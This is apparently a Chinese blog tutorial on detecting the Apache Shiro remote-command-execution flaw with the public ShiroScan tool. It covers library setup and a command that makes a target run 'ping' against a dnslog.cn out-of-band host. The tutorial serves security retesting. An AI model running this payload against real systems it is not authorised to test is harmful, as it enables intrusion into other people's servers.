前段时间的复测工作中碰到了,后来也有人来问我怎么做其实这并不难测,大佬们都有自己的方法,问了也是让自己百度自己想办法,然而我第一次碰到的时候仍花了很长时间于是提供一种简单快捷的检查方法,如果帮到你了就给文章点个赞吧~
原理什么的就不讲了,直接正题
用这个工具:https://github.com/sv3nbeast/ShiroScan
建议下到windows。需要python3环境。
之后进入文件夹,打开shiro_rce.py,增加如下几个模块:
import os
import re
import base64
import uuid
import subprocess
import requests
from Crypto.Cipher import AES
其中requests和Crypto是第三方库,需要另行安装
pip install requests
Crypto这个库比较邪门。。我用pip install直接安装会各种报错
于是我先卸载掉
pip uninstall Crypto pip uninstall Cipher
然后装这个
pip install pycryptodome
需要一个dnslog平台,我用的是http://www.dnslog.cn/
cmd下进入ShiroScan的目录
python shiro_rce.py url "ping 4v7o2m.dnslog.cn"
URL就是要测试的目标地址。执行后,回来refresh下看看是否记录了该域名的dns查询记录,即证明目标是否存在命令执行。有,就说明存在漏洞